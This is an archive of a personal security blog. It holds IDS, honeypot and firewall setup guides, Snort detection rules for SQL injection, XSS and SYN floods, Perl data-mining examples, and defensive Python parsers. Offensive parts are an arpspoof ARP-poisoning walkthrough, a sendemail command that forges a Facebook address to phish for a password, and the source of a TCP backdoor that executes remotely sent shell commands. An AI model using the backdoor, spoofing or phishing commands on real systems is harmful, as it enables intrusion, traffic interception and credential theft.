For more details, refer to http://www.openspf.org/SPF_Record_Syntax
SPF is actually a TXT record on your DNS server. Please review the picture shown as follows:
Monday, December 18, 2017
Sunday, December 10, 2017
Install and configure Suricata at Raspberry Pi
Installation:
# apt-get update; apt-get install suricata
# cp /etc/suricata/suricata.yaml /etc/suricata/suricata.yaml.bak
# cd /etc/suricata/rules
# wget https://rules.emergingthreats.net/open/suricata-2.0/emerging-all.rules
# vi /etc/suricata/suricata.yaml
Make sure the following entry appears under rule-files: in suricata.yaml:
- emerging-all.rules
Execution:
# suricata -c /etc/suricata/suricata.yaml -i wlan0
Running as a Daemon:
# suricata -c /etc/suricata/suricata.yaml -i wlan0 -D
Reading the alert log:
# tail -n 10 -f /var/log/suricata/fast.log
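Once alerts are flowing into fast.log, the next step is triage. The following added example (not code from the original post) parses the fast.log line format Suricata writes, one alert per line, and aggregates alerts by signature and by source address. The log lines are constructed for this example and the sids are in the local range, not real Emerging Threats signatures.

```python
import re
from collections import Counter

# fast.log layout: timestamp  [**] [gid:sid:rev] msg [**] [Classification: ...] [Priority: n] {PROTO} src:sport -> dst:dport
FAST_LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+\[\*\*\]\s+\[(?P<gid>\d+):(?P<sid>\d+):(?P<rev>\d+)\]\s+"
    r"(?P<msg>.+?)\s+\[\*\*\]\s+\[Classification:\s*(?P<classification>[^\]]*)\]\s+"
    r"\[Priority:\s*(?P<priority>\d+)\]\s+\{(?P<proto>[^}]+)\}\s+"
    r"(?P<src>\S+?):(?P<sport>\d+)\s+->\s+(?P<dst>\S+?):(?P<dport>\d+)$"
)

# Constructed sample alerts (not a real capture); sids 9000001-9000003 are local-range placeholders.
SAMPLE_FAST_LOG = """\
12/10/2017-21:03:11.482916  [**] [1:9000001:1] CONSTRUCTED SSH brute-force pattern [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 203.0.113.5:51234 -> 192.168.1.20:22
12/10/2017-21:03:12.010233  [**] [1:9000001:1] CONSTRUCTED SSH brute-force pattern [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 203.0.113.5:51240 -> 192.168.1.20:22
12/10/2017-21:03:15.773001  [**] [1:9000002:2] CONSTRUCTED Outbound DNS query to sinkhole [**] [Classification: A Network Trojan was detected] [Priority: 1] {UDP} 192.168.1.20:40111 -> 198.51.100.9:53
12/10/2017-21:03:18.000417  [**] [1:9000003:1] CONSTRUCTED Web scanner user-agent [**] [Classification: Misc activity] [Priority: 3] {TCP} 203.0.113.5:51300 -> 192.168.1.20:8080
"""


def parse_fast_log(text):
    """Return one dict per parsable alert line; lines that do not match the layout are skipped."""
    alerts = []
    for line in text.splitlines():
        m = FAST_LOG_RE.match(line)
        if m:
            alerts.append(m.groupdict())
    return alerts


def summarize(alerts):
    """Aggregate the way a first triage pass would: per signature, per source, and priority-1 alerts."""
    by_sid = Counter((a["sid"], a["msg"]) for a in alerts)
    by_src = Counter(a["src"] for a in alerts)
    high_priority = [a for a in alerts if int(a["priority"]) <= 1]
    return {"by_sid": by_sid, "by_src": by_src, "high_priority": high_priority}


if __name__ == "__main__":
    summary = summarize(parse_fast_log(SAMPLE_FAST_LOG))
    for (sid, msg), n in summary["by_sid"].most_common():
        print(f"sid {sid}: {n} x {msg}")
    for src, n in summary["by_src"].most_common():
        print(f"{src}: {n} alerts")
    print(f"{len(summary['high_priority'])} priority-1 alerts")
```

Feed it the real file with `parse_fast_log(open("/var/log/suricata/fast.log").read())`; for anything beyond a quick look, Suricata's eve.json output is easier to process than fast.log, since it is already structured.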
Saturday, December 2, 2017
Implement ARP POISONING from the Command Line on Kali Linux
1) Enable the IP Forward function by executing the command below:
echo 1 > /proc/sys/net/ipv4/ip_forward
2) Run Arpspoof as shown below.
Usage:
arpspoof -i eth0 -t VICTIM_IP -r GATEWAY_IP
Example:
arpspoof -i eth0 -t 172.31.99.251 -r 172.31.98.1
Once the steps above are successfully completed, all traffic from 172.31.99.251 (i.e. the victim) to 172.31.98.1 (i.e. the gateway) will go through your PC.
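Seen from the defender's side, the procedure above leaves two symptoms on the wire: the gateway's IP is suddenly announced with a different MAC, and one MAC ends up claiming several IPs (its own, the gateway's and the victim's). The following added example (not code from the original post) detects both over a list of constructed ARP-reply observations; the IPs are the ones used in the walkthrough, the MACs are made-up locally administered addresses.

```python
from collections import defaultdict

# Constructed ARP-reply observations (time, sender IP, sender MAC); not a real capture.
# 172.31.98.1 is the gateway and 172.31.99.251 the victim from the walkthrough above.
OBSERVED_ARP_REPLIES = [
    (1, "172.31.98.1",   "02:00:00:00:00:01"),  # gateway announces its real MAC
    (2, "172.31.99.251", "02:00:00:00:00:02"),  # victim announces its real MAC
    (3, "172.31.99.10",  "02:00:00:00:00:03"),  # third host on the segment
    (4, "172.31.98.1",   "02:00:00:00:00:03"),  # gateway IP now claimed by the third host's MAC
    (5, "172.31.99.251", "02:00:00:00:00:03"),  # victim IP claimed by the same MAC
]


def detect_arp_spoofing(observations):
    """Return (binding_changes, multi_ip_macs).

    binding_changes lists (time, ip, old_mac, new_mac) each time an IP is re-announced with
    a different MAC; multi_ip_macs maps every MAC that claimed more than one IP to that set.
    arpspoof produces both symptoms at once, because the attacker's MAC is advertised for the
    gateway and the victim while the attacker keeps answering for its own IP.
    """
    ip_to_mac = {}
    mac_to_ips = defaultdict(set)
    changes = []
    for t, ip, mac in observations:
        mac = mac.lower()
        previous = ip_to_mac.get(ip)
        if previous is not None and previous != mac:
            changes.append((t, ip, previous, mac))
        ip_to_mac[ip] = mac
        mac_to_ips[mac].add(ip)
    multi = {m: ips for m, ips in mac_to_ips.items() if len(ips) > 1}
    return changes, multi


if __name__ == "__main__":
    changes, multi = detect_arp_spoofing(OBSERVED_ARP_REPLIES)
    for t, ip, old, new in changes:
        print(f"t={t}: {ip} moved from {old} to {new}")
    for mac, ips in multi.items():
        print(f"{mac} claims {len(ips)} IPs: {sorted(ips)}")
```

A gateway whose MAC changes is the highest-value signal to alert on; static ARP entries for the gateway on critical hosts, or Dynamic ARP Inspection on managed switches, prevent the redirection rather than just detecting it.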
Sunday, November 5, 2017
Installing a honeypot called LaBrea on Raspberry Pi
root@raspberrypi:~# apt-get update
root@raspberrypi:~# apt-get install labrea
root@raspberrypi:~# vi /etc/labrea.conf
#
# This is a comment
#
#Exclude 192.168.0.1 through 192.168.0.252
192.168.0.1 - 192.168.0.252 EXC
#Hard exclude 192.168.0.253
#192.168.0.253 HAR
#Do not capture packets from 192.168.1.0/24
#192.168.1.0/24 IPI
#Do not tarpit / persist capture on ports 21-25:
#21-25 POR
#When firewalling, make port 12345 active at startup:
#12345 PMN
[ESC]:wq
root@raspberrypi:~# /usr/sbin/labrea -z -q -h -s -v -v -f -b -X -d -o -p 2000000 --init-f /etc/labrea.conf -i wlan0
Saturday, October 21, 2017
A simple application for sending fake emails in Kali Linux.
In Kali Linux, there is an application called sendemail that allows users to send fake emails (the sender address is whatever is passed to -f). Its usage is shown as follows:
sendemail -f source_email_address -t destination_email_address -u email_subject -m email_content -s email_server:email_service_port
Here is a sample command for sending such a mock email.
#sendemail -f admin@facebook.com -t alex@gmail.com -u 'Your Facebook account is expired!' -m 'Please send back your Facebook account and password to hacker@gmail.com.' -s 192.168.1.10:25
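Both the SPF note at the top of this page and the sendemail example above come down to the same receiver-side check: the domain in the sender address publishes, in a TXT record, which hosts may send mail for it, and a receiving server compares the connecting IP against that record. The following added example (not code from the original posts) implements that evaluation offline for the ip4, ip6 and all mechanisms of RFC 7208. The records in SPF_RECORDS are constructed stand-ins for DNS answers on documentation domains, and the DNS-dependent mechanisms (a, mx, include, exists, ptr) and modifiers are skipped, which is a simplification of this evaluator rather than RFC behaviour. A forged sender whose domain ends its record with -all is rejected when the mail arrives from an unlisted server such as the 192.168.1.10 used above.

```python
import ipaddress

# RFC 7208 qualifier -> result; a mechanism written without a qualifier means "+".
QUALIFIERS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}
# Mechanisms that need DNS lookups; this offline evaluator treats them as non-matching (assumption).
DNS_MECHANISMS = {"a", "mx", "include", "exists", "ptr"}

# Constructed TXT records standing in for DNS answers (example.com / example.net are documentation domains).
SPF_RECORDS = {
    "example.com": "v=spf1 ip4:203.0.113.0/24 ip4:198.51.100.25 -all",
    "example.net": "v=spf1 ip4:203.0.113.10 ~all",
}


def parse_spf(record):
    """Split an SPF TXT record into (qualifier, name, value) terms; modifiers get qualifier 'modifier'."""
    tokens = record.strip().split()
    if not tokens or tokens[0].lower() != "v=spf1":
        raise ValueError("not an SPF version 1 record")
    terms = []
    for token in tokens[1:]:
        if "=" in token:  # modifier such as redirect=... or exp=...
            name, _, value = token.partition("=")
            terms.append(("modifier", name.lower(), value))
            continue
        qualifier = "+"
        if token[0] in QUALIFIERS:
            qualifier, token = token[0], token[1:]
        name, _, value = token.partition(":")
        name = name.partition("/")[0].lower()  # strip a dual-cidr suffix such as a/24
        terms.append((qualifier, name, value))
    return terms


def check_host(record, client_ip):
    """Evaluate `record` for the connecting `client_ip` and return the RFC 7208 result string."""
    ip = ipaddress.ip_address(client_ip)
    try:
        terms = parse_spf(record)
    except ValueError:
        return "permerror"
    for qualifier, name, value in terms:
        if qualifier == "modifier":
            continue  # redirect= / exp= would need DNS; ignored offline
        if name == "all":
            return QUALIFIERS[qualifier]
        if name in ("ip4", "ip6"):
            try:
                network = ipaddress.ip_network(value, strict=False)
            except ValueError:
                return "permerror"  # a malformed address is a permanent error in the record
            if network.version == ip.version and ip in network:
                return QUALIFIERS[qualifier]
        elif name in DNS_MECHANISMS:
            continue
        else:
            return "permerror"  # unknown mechanism
    return "neutral"  # nothing matched and no "all" term (RFC 7208 section 4.7)


def evaluate_sender(mail_from, client_ip, records=SPF_RECORDS):
    """Look up the MAIL FROM domain's record in the constructed table and evaluate it."""
    domain = mail_from.rpartition("@")[2].lower()
    record = records.get(domain)
    if record is None:
        return "none"  # the domain publishes no SPF record
    return check_host(record, client_ip)


if __name__ == "__main__":
    for sender, ip in [("alerts@example.com", "198.51.100.25"), ("alerts@example.com", "192.168.1.10"),
                       ("news@example.net", "192.168.1.10"), ("someone@example.org", "192.168.1.10")]:
        print(f"{sender} from {ip}: {evaluate_sender(sender, ip)}")
```

The result strings are the ones a receiving MTA records in the Received-SPF header; a "fail" under a -all policy is what lets the receiver reject the forged message at SMTP time, and DMARC builds on the same evaluation.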
Wednesday, September 13, 2017
An example for Apriori coded in Perl
#!/usr/bin/perl -w
use Data::Mining::Apriori;
$|=1;
$apriori = new Data::Mining::Apriori;
$apriori->{metrics}{minSupport}=0.0155; # The minimum support(required), default value is 0.01(1%)
$apriori->{metrics}{minConfidence}=0.0155; # The minimum confidence(required), default value is 0.10(10%)
$apriori->{metrics}{minLift}=1; # The minimum lift(optional)
$apriori->{metrics}{minLeverage}=0; # The minimum leverage(optional)
$apriori->{metrics}{minConviction}=0; # The minimum conviction(optional)
$apriori->{metrics}{minCoverage}=0; # The minimum coverage(optional)
$apriori->{metrics}{minCorrelation}=0; # The minimum correlation(optional)
$apriori->{metrics}{minCosine}=0; # The minimum cosine(optional)
$apriori->{metrics}{minLaplace}=0; # The minimum laplace(optional)
$apriori->{metrics}{minJaccard}=0; # The minimum jaccard(optional)
#$apriori->{output}=1;
# The output type(optional): 1 - Export to text file delimited by tab; 2 - Export to excel file with chart.
#$apriori->{pathOutputFiles}='data/'; # The path to output files(optional)
$apriori->{messages}=1; # A value boolean to display the messages(optional)
$apriori->{keyItemsDescription}{'101'}='MILK'; # Hash table reference to add items by key and description
$apriori->{keyItemsDescription}{102}='BREAD';
$apriori->{keyItemsDescription}{'103'}='CEREAL';
@items=(103,101);
$apriori->insert_key_items_transaction(\@items); # Insert key items by transaction
$apriori->insert_key_items_transaction([103,102]);
$apriori->insert_key_items_transaction([103,101]);
$apriori->insert_key_items_transaction([103,101,102]);
$apriori->insert_key_items_transaction([101,102]);
$apriori->insert_key_items_transaction([103,101,102]);
$apriori->insert_key_items_transaction([103,101]);
$apriori->insert_key_items_transaction([103,102]);
$apriori->insert_key_items_transaction([103,101,102]);
$apriori->insert_key_items_transaction([103,101,102]);
print "\n${\$apriori->quantity_possible_rules}"; # Show the quantity of possible rules
$apriori->{limitRules}=10; # The limit of rules(optional)
$apriori->{limitSubsets}=12; # The limit of subsets(optional)
$apriori->generate_rules;
# Generate association rules until the minimum support, confidence, lift, leverage, conviction, coverage, correlation, cosine, laplace or jaccard is no longer met, or the limit of rules is reached
print "\n@{$apriori->{frequentItemset}}\n"; # Show frequent items
exit(0); # exit status 0 signals success
Monday, September 4, 2017
An example for Decision Tree with Perl
#!/usr/bin/perl -w
#Refer to http://search.cpan.org/~kwilliams/AI-DecisionTree-0.11/lib/AI/DecisionTree.pm
use AI::DecisionTree;
$dtree = new AI::DecisionTree;
# Training instances: weather attributes and the result label (yes/no)
$dtree->add_instance(attributes => {outlook => 'sunny',
                                    temperature => 'hot',
                                    humidity => 'high'},
                     result => 'no');
$dtree->add_instance(attributes => {outlook => 'sunny',
                                    temperature => 'hot',
                                    humidity => 'normal'},
                     result => 'yes');
$dtree->add_instance(attributes => {outlook => 'overcast',
                                    temperature => 'cold',
                                    humidity => 'normal'},
                     result => 'no');
$dtree->add_instance(attributes => {outlook => 'sunny',
                                    temperature => 'cold',
                                    humidity => 'normal'},
                     result => 'yes');
$dtree->train;
# Query the trained tree for one set of attributes
$result = $dtree->get_result(attributes => {outlook => 'sunny',
                                            temperature => 'hot',
                                            humidity => 'normal'});
print $result."\n";
exit(0); # exit status 0 signals success
Monday, August 28, 2017
Install OpenVAS in Kali Linux
1) Use apt-get to install OpenVAS.
#apt-get update
#apt-get install openvas openvas-cli openvas-manager openvas-manager-common openvas-scanner greenbone-security-assistant greenbone-security-assistant-common
2) Utilize openvas-setup to configure OpenVAS.
#openvas-setup
After the processing is done, the temporary password shows up. Record the password.
3) Run openvas-start.
#openvas-start
4) Open a browser and go to https://127.0.0.1:9392/.
5) Log in with the username admin and the password recorded above.
6) Enjoy! Don't forget to change your password the first time you log in.
Wednesday, July 12, 2017
A Snort rule file for identifying SQL Injection and XSS
#https://www.symantec.com/connect/articles/detection-sql-injection-and-cross-site-scripting-attacks
alert tcp any any -> any $HTTP_PORTS (msg:"SQL Injection - Paranoid";flow:to_server,established;pcre:"/(\%27)|(\')|(\-\-)|(%23)|(#)/i"; classtype:Web-application-attack; sid:909900;rev:5;)
#alert tcp any any -> any $HTTP_PORTS (msg:"Modified regex for detection of SQL meta-characters";flow:to_server,established;pcre:"/((\%3D)|(=))[^\n]*((\%27)|(\')|(\-\-)|(\%3B)|(\;))/i"; classtype:Web-application-attack; sid:910000;rev:5;)
alert tcp any any -> any $HTTP_PORTS (msg:"Regex for typical SQL Injection attack";flow:to_server,established;pcre:"/\w*((\%27)|(\'))((\%6F)|o|(\%4F))((\%72)|r|(\%52))/ix"; classtype:Web-application-attack; sid:910001;rev:5;)
alert tcp any any -> any $HTTP_PORTS (msg:"Regex for detecting SQL Injection with the UNION keyword";flow:to_server,established;pcre:"/((\%27)|(\'))union/ix"; classtype:Web-application-attack; sid:910002;rev:5;)
alert tcp any any -> any $HTTP_PORTS (msg:"Regex for detecting SQL Injection attacks on a MS SQL Server";flow:to_server,established;pcre:"/exec(\s|\+)+(s|x)p\w+/ix"; classtype:Web-application-attack; sid:910003;rev:5;)
alert tcp any any -> any $HTTP_PORTS (msg:"Regex for simple CSS attack";flow:to_server,established;pcre:"/((\%3C)|<)((\%2F)|\/)*[a-z0-9\%]+((\%3E)|>)/ix"; classtype:Web-application-attack; sid:910004;rev:5;)
alert tcp any any -> any $HTTP_PORTS (msg:"Regex for img src CSS attack";flow:to_server,established;pcre:"/((\%3C)|<)((\%69)|i|(\%49))((\%6D)|m|(\%4D))((\%67)|g|(\%47))[^\n]+((\%3E)|>)/I"; classtype:Web-application-attack; sid:910005;rev:5;)
alert tcp any any -> any $HTTP_PORTS (msg:"Paranoid regex for CSS attacks";flow:to_server,established;pcre:"/((\%3C)|<)[^\n]+((\%3E)|>)/I"; classtype:Web-application-attack; sid:910006;rev:5;)
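To see what these rules actually fire on before deploying them, the following added Python harness (not part of the original post) compiles the PCRE bodies of the seven active rules above and runs them over constructed HTTP request lines. Snort's i and x modifiers map onto re.I and re.X; the /I on the last two rules is a Snort buffer selector with no regex-engine equivalent, so those two are simply matched case-insensitively against the whole request line here, which is an assumption of this harness. The request lines are made up for the test, not taken from any capture.

```python
import re

# sid -> (msg, PCRE body as written in the rule, Python flags derived from the Snort modifiers)
RULES = {
    909900: ("SQL Injection - Paranoid",
             r"(\%27)|(\')|(\-\-)|(%23)|(#)", re.I),
    910001: ("Regex for typical SQL Injection attack",
             r"\w*((\%27)|(\'))((\%6F)|o|(\%4F))((\%72)|r|(\%52))", re.I | re.X),
    910002: ("Regex for detecting SQL Injection with the UNION keyword",
             r"((\%27)|(\'))union", re.I | re.X),
    910003: ("Regex for detecting SQL Injection attacks on a MS SQL Server",
             r"exec(\s|\+)+(s|x)p\w+", re.I | re.X),
    910004: ("Regex for simple CSS attack",
             r"((\%3C)|<)((\%2F)|\/)*[a-z0-9\%]+((\%3E)|>)", re.I | re.X),
    910005: ("Regex for img src CSS attack",
             r"((\%3C)|<)((\%69)|i|(\%49))((\%6D)|m|(\%4D))((\%67)|g|(\%47))[^\n]+((\%3E)|>)", re.I),
    910006: ("Paranoid regex for CSS attacks",
             r"((\%3C)|<)[^\n]+((\%3E)|>)", re.I),
}
COMPILED = {sid: (msg, re.compile(pattern, flags)) for sid, (msg, pattern, flags) in RULES.items()}

# Constructed request lines: two benign (one with an apostrophe), five carrying the patterns the rules describe.
SAMPLE_REQUESTS = {
    "benign":     "GET /search?q=shoes HTTP/1.1",
    "apostrophe": "GET /users?name=O'Brien HTTP/1.1",
    "tautology":  "GET /item?id=1'or'1'='1 HTTP/1.1",
    "union":      "GET /item?id=1%27union%20select%201,2 HTTP/1.1",
    "mssql_exec": "GET /report?cmd=exec+sp_help HTTP/1.1",
    "script_tag": "GET /page?name=<script>alert(1)</script> HTTP/1.1",
    "img_tag":    "GET /profile?bio=<img src=x> HTTP/1.1",
}


def evaluate(request_line):
    """Return the set of sids whose regex matches somewhere in the raw request line."""
    return {sid for sid, (_msg, rx) in COMPILED.items() if rx.search(request_line)}


if __name__ == "__main__":
    for label, line in SAMPLE_REQUESTS.items():
        hits = sorted(evaluate(line))
        print(f"{label:<11} {', '.join(f'{sid} ({COMPILED[sid][0]})' for sid in hits) or 'no alert'}")
```

The "apostrophe" request shows why sid 909900 is labelled paranoid: any legitimate quote, double dash or hash in a URL trips it, so in practice it is run with a threshold or only against selected servers. Note also that the rules see the raw bytes; a server that decodes other encodings (for example double URL-encoding) can still receive input these patterns never saw.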
Monday, July 10, 2017
What makes security products eligible to be sold? [PART II]
For a cybersecurity product to be sold in the United States, the two certifications below should be obtained.
- Common Criteria (At least EAL2+)
- The Federal Information Processing Standard (FIPS) Publication 140-2, (FIPS PUB 140-2)
Sunday, July 9, 2017
Two good sites providing packet analysis resources.
http://www.malware-traffic-analysis.net/
Provides a variety of PCAP files for you to analyze.
https://packettotal.com/
Similar to VirusTotal, it offers an interface that lets you submit any suspicious packet capture for analysis.
Thursday, June 15, 2017
How long cybersecurity logs should be retained according to DFS.
Retrieved from http://www.dfs.ny.gov/legal/regulations/adoptions/dfsrf500txt.pdf
Based on Section 500.06 Audit Trail, the audit trails relevant to Cybersecurity should be kept for not fewer than 3 years.
Saturday, May 20, 2017
Sandbox solutions
Sandboxing can be used to filter malicious content out of both data at rest and data in motion. The technique known as Deep Content Inspection (DCI) can be combined with a sandbox to inspect data in motion.
The content below itemizes multiple Sandbox solutions.
Commonly used Online solutions are:
Malwr,
Anubis,
ThreatExpert,
Comodo,
ThreatTrack ThreatAnalyzer,
Xandora,
CWSandbox (not updated since April 2010),
Malbox (not updated since May 2011, developers site not accessible anymore).
Commonly used Standalone solutions are:
Cuckoo,
ReVirt (not updated since June 2003),
Sandboxie,
Buster,
Minibis (not updated since June 2011),
Remnux,
Zero Wine Tryout,
Truman (not updated since January 2006),
BitBlaze (not updated since September 2009).
How to back up the rules of Windows Firewall in Windows 2003
Normally, all Windows-Firewall rules in Windows 2003 are stored at a specific key shown as follows.
HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy
Therefore, backing up that key backs up all rules. Whenever the rules need to be recovered, importing the key restores them right away.
Sunday, May 14, 2017
Suggestion regarding Wannacry from Symantec
https://www.symantec.com/connect/blogs/what-you-need-know-about-wannacry-ransomware
Sunday, May 7, 2017
RMIAS
https://upload.wikimedia.org/wikipedia/commons/d/da/A_Reference_Model_of_Information_Assurance_and_Security_%28RMIAS%29.png
What makes security products eligible to be sold?
There are multiple credentials that should be obtained before a product is sold. They are shown as follows:
- IPv6 Ready Logo Site | Phase-2 (https://www.ipv6ready.org/)
- VERACODE (https://www.veracode.com/)
- FCC (https://www.fcc.gov/)
- CB (http://www.iecee.org/certification/certificates/)
- CE (https://ec.europa.eu/growth/single-market/ce-marking_en)
Wednesday, May 3, 2017
Why would an administrator deploy a honeypot?
The answers below are from R.I.T.
1) To learn about hacker techniques
2) To lure attackers away from critical systems
3) To allow administrators to refine firewall rules
Tuesday, May 2, 2017
Solve the issue of missing library files
Add the directories containing the missing library files to /etc/ld.so.conf, then run ldconfig to rebuild the loader cache. An example is shown as follows. (With "sudo echo ... >> file" the redirection is performed by the unprivileged shell and fails on a root-owned file, so the append goes through tee instead.)
# echo "/usr/local/lib" | sudo tee -a /etc/ld.so.conf
# sudo ldconfig
Friday, April 21, 2017
Manipulate WMI through Perl
Online Library:
Inquiry Tool:
WMI Explorer (https://wmie.codeplex.com/)
An example of manipulating WMI through Perl
--------------------------------------------
#!/usr/bin/perl -w
#use strict;
#Execute a command:
#wmic /node:remote_computer process call create "netstat.exe -ano"
use Win32::OLE qw(in); # 'in' iterates over an OLE collection and must be imported explicitly
$|=1;
print("Target IP: ");
$target=<STDIN>;
chomp($target);
#my ( $ServiceSet, $Service );
# Connect to the remote CIMv2 namespace (\\target\Root\CIMv2) and query the network adapters
eval { $NetworkAdapters = Win32::OLE->GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\".$target."\\Root\\CIMv2")->ExecQuery("SELECT * FROM Win32_NetworkAdapter"); };
unless($@){
    print "\n";
    foreach $Adapter (in $NetworkAdapters){
        print $Adapter->{Name}, "\n"; # print each adapter's Name property (the loop body was empty in the original)
    }
}else{
    print STDERR Win32::OLE->LastError, "\n";
}
--------------------------------------------
Install Snort in Kali from source code (20170421)
#cd /usr/local/sbin
#wget http://www.tcpdump.org/release/libpcap-1.8.1.tar.gz
#tar -zxvf ./libpcap-1.8.1.tar.gz
#cd libpcap-1.8.1
#./configure && make && make install
#cd /usr/local/sbin
#wget https://www.snort.org/downloads/snort/daq-2.0.6.tar.gz
#wget https://www.snort.org/downloads/snort/snort-2.9.9.0.tar.gz
#tar -zxvf ./daq-2.0.6.tar.gz
#cd daq-2.0.6
#./configure --with-libpcap-includes=/usr/local/sbin/libpcap-1.8.1 --with-libpcap-libraries=/usr/local/sbin/libpcap-1.8.1
#make && make install
#cd /usr/local/sbin
#wget ftp://ftp.csx.cam.ac.uk/pub/software/programming/pcre/pcre-8.40.tar.gz
#tar -zxvf ./pcre-8.40.tar.gz
#cd pcre-8.40
#./configure
#make && make install
#cd /usr/local/sbin
#wget https://cytranet.dl.sourceforge.net/project/libdnet/libdnet/libdnet-1.11/libdnet-1.11.tar.gz
#tar -zxvf ./libdnet-1.11.tar.gz
#cd libdnet-1.11
#./configure
#make && make install
#cd /usr/local/sbin
#wget http://www.zlib.net/zlib-1.2.11.tar.gz
#tar -zxvf ./zlib-1.2.11.tar.gz
#cd zlib-1.2.11
#./configure && make && make install
#cd /usr/local/sbin
#tar -zxvf ./snort-2.9.9.0.tar.gz
#cd snort-2.9.9.0
#./configure --enable-flexresp3 --enable-sourcefire --with-dnet-includes=/usr/local/sbin/libdnet-1.11/include --with-dnet-libraries=/usr/local/lib
#make && make install
#ln -s /usr/local/lib/libdnet.1.0.1 /lib/libdnet.1
#snort -V
Sunday, April 9, 2017
Saturday, April 8, 2017
Tuesday, April 4, 2017
Tuesday, March 28, 2017
Summarized instruction of the ufw in Kali
ufw is a front-end for iptables, and gufw offers a GUI for ufw.
The instructions below show how to install and tweak ufw in Kali.
/* Installation: */
# apt-get update
# apt-get install gufw
/* For the first time using: */
# ufw status verbose
Status: inactive
# vi /etc/ufw/policies.rules
----------------------------------------
#!/bin/sh
ufw allow proto tcp from 192.168.1.35 to 192.168.1.38 port 25
ufw allow proto tcp from 192.168.1.189 to 192.168.1.38 port 25
ufw allow in from 192.168.172.222 comment 'Alex PC'
ufw allow ssh
ufw deny in on eth0
ufw allow out on eth0
:wq
----------------------------------------
/* Bear in mind that the rules within the policies file would be executed from the top to the bottom. */
# chmod 744 /etc/ufw/policies.rules
# /etc/ufw/policies.rules
# ufw enable
/* For automatic startup: */
# systemctl enable ufw.service
/* For seeing more detail: */
# ufw status verbose
Saturday, March 25, 2017
A Snort rule dedicated to Syn Flood
#After testing, I figured out that 1500 SYN packets per second would be an appropriate metric for determining SYN Flood.
alert tcp any any -> $HOME_NET any (flags:S; msg:"Possible SYN Flood DoS"; flow:stateless; detection_filter:track by_dst, count 1500, seconds 1; classtype:attempted-dos; sid:1000890;)
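The rule's detection_filter is a sliding-window counter kept per destination: the 1500th SYN to a host within any one-second span triggers the alert. The following added example (not code from the original post) reproduces that logic in Python over constructed traffic so a threshold can be sanity-checked offline: a burst of 1600 SYNs in 0.8 s to one host trips it, while a trickle of SYNs to a second host and a stream of ACK packets to the first do not. Packets are (timestamp, destination IP, TCP flags) tuples constructed in the block.

```python
from collections import defaultdict, deque


def syn_flood_alerts(packets, count=1500, seconds=1.0):
    """Replay packets through a per-destination sliding window; return {dst: first_alert_time}.

    Mirrors `flags:S` plus `detection_filter: track by_dst, count 1500, seconds 1`: only
    packets with exactly the SYN bit set are counted, and a destination alerts the first time
    `count` of them fall within `seconds`. packets must be in arrival order.
    """
    windows = defaultdict(deque)
    alerts = {}
    for ts, dst, flags in packets:
        if flags != "S":
            continue  # flags:S matches SYN-only packets; SYN/ACK, ACK etc. are not counted
        window = windows[dst]
        window.append(ts)
        while window and ts - window[0] >= seconds:
            window.popleft()  # drop SYNs that fell out of the window
        if len(window) >= count and dst not in alerts:
            alerts[dst] = ts
    return alerts


def build_sample_traffic():
    """Constructed traffic (not a capture): 1600 SYNs to one host in 0.8 s, a 50-SYN trickle over
    5 s to another, and 2000 ACKs to the first host that must not be counted."""
    burst = [(10.0 + i * 0.0005, "192.168.1.20", "S") for i in range(1600)]
    trickle = [(10.0 + i * 0.1, "192.168.1.30", "S") for i in range(50)]
    acks = [(10.0 + i * 0.0004, "192.168.1.20", "A") for i in range(2000)]
    return sorted(burst + trickle + acks)


if __name__ == "__main__":
    for dst, ts in syn_flood_alerts(build_sample_traffic()).items():
        print(f"Possible SYN Flood DoS against {dst}, threshold reached at t={ts:.4f}")
```

Lowering `count` in the call (for example to 10) makes the trickle host alert as well, which is a quick way to see how much headroom a threshold leaves above normal connection rates on a given network before committing it to the rule.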
Thursday, March 16, 2017
Triggering SYN Flood and background stress traffic for NIDS test
Retrieved from http://tools.kali.org/tools-listing
For triggering a SYN flood, the Metasploit Framework supports it directly.
To generate a large volume of background stress traffic for evaluating the performance of the NIDS under test, SlowHTTPTest can be used. An example of running SlowHTTPTest is shown as follows:
slowhttptest -c 1000 -B -g -o report -i 110 -r 200 -s 8192 -t GET -u http://test.com -x 10 -p 3
Wednesday, January 11, 2017
A simple TCP port scanner
#!/usr/bin/env python3
import socket
import sys

# Target host defaults to localhost when no argument is given
HOST = sys.argv[1] if len(sys.argv) > 1 else '127.0.0.1'
PORTS = [8, 21, 22, 23, 80, 135, 139, 445, 8080]

for PORT in PORTS:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(2)  # do not hang on filtered ports
    try:
        s.connect((HOST, PORT))
        print("%s:%s is open!" % (HOST, PORT))
    except (socket.timeout, OSError):
        print("%s:%s is closed!" % (HOST, PORT))
    finally:
        s.close()
A simple TCP backdoor
#!/usr/bin/python
import socket, sys, subprocess

class BreakOutOfALoop(Exception): pass

def execute( command ):
    subprocess.check_output(command, shell=True)
    return

HOST = '';
try:
    PORT = int(sys.argv[1])  # bind() needs an integer port, not the argv string
except:
    PORT = 8888
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((HOST, PORT))
s.listen(1)
while 1:
    try:
        conn, addr = s.accept()
        while 1:
            conn.sendall("# ")
            try:
                data = conn.recv(1024)
            except:
                raise BreakOutOfALoop
            execute(data)
            #print type(data)
            data = data[:-1]
            conn.sendall("%s is executed!\r\n" % data)
    except BreakOutOfALoop:
        continue
conn.close()
s.close()